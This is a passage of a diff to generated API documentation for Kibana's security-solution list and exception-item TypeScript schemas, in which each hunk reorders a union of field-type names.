\"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | 
\"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | 
\"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_exception_item_schema/index.ts", "deprecated": false, 
@@ -2989,7 +2989,7 @@ "label": "ImportListItemQuerySchema", "description": [], "signature": [ - "{ deserializer: string | undefined; list_id: string | undefined; serializer: string | undefined; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" + "{ deserializer: string | undefined; list_id: string | undefined; serializer: string | undefined; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_list_item_query_schema/index.ts", "deprecated": false, 
@@ -3003,7 +3003,7 @@ "label": "ImportListItemQuerySchemaEncoded", "description": [], "signature": [ - "{ deserializer?: string | undefined; list_id?: string | undefined; serializer?: string | undefined; type?: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" + "{ deserializer?: string | undefined; list_id?: string | undefined; serializer?: string | undefined; type?: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_list_item_query_schema/index.ts", "deprecated": false, 
@@ -3115,7 +3115,7 @@ "label": "ListArraySchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_schema/index.ts", "deprecated": false, 
@@ -3157,7 +3157,7 @@ "label": "ListItemArraySchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_item_schema/index.ts", "deprecated": false, 
@@ -3185,7 +3185,7 @@ "label": "ListItemSchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }" + "{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_item_schema/index.ts", "deprecated": false, 
@@ -3213,7 +3213,7 @@ "label": "ListSchema", "description": [], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/list_schema/index.ts", "deprecated": false, 
@@ -3423,7 +3423,7 @@ "label": "NonEmptyEntriesArray", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: 
string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, 
@@ -3437,7 +3437,7 @@ "label": "NonEmptyEntriesArrayDecoded", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; 
value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/non_empty_entries_array/index.ts", "deprecated": false, @@ -3829,7 +3829,7 @@ "label": "SearchListItemArraySchema", "description": [], "signature": [ - "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]" + "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/search_list_item_schema/index.ts", "deprecated": false, 
@@ -3843,7 +3843,7 @@ "label": "SearchListItemSchema", "description": [], "signature": [ - "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }" + "{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/search_list_item_schema/index.ts", "deprecated": false, 
@@ -3983,7 +3983,7 @@ "label": "Type", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/type/index.ts", "deprecated": false, @@ -3997,7 +3997,7 @@ "label": "TypeOrUndefined", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/type/index.ts", "deprecated": false, 
@@ -4053,7 +4053,7 @@ "label": "UpdateEndpointListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | 
\"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_endpoint_list_item_schema/index.ts", "deprecated": false, 
@@ -4067,7 +4067,7 @@ "label": "UpdateEndpointListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | 
\"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: 
\"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; _version: string | undefined; comments: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id: string | undefined; item_id: string | undefined; meta: object | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\"> & { comments: ({ comment: string; } & { id?: string | undefined; })[]; tags: string[]; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/update_endpoint_list_item_schema/index.ts", "deprecated": false, 
@@ -4081,7 +4081,7 @@ "label": "UpdateExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | 
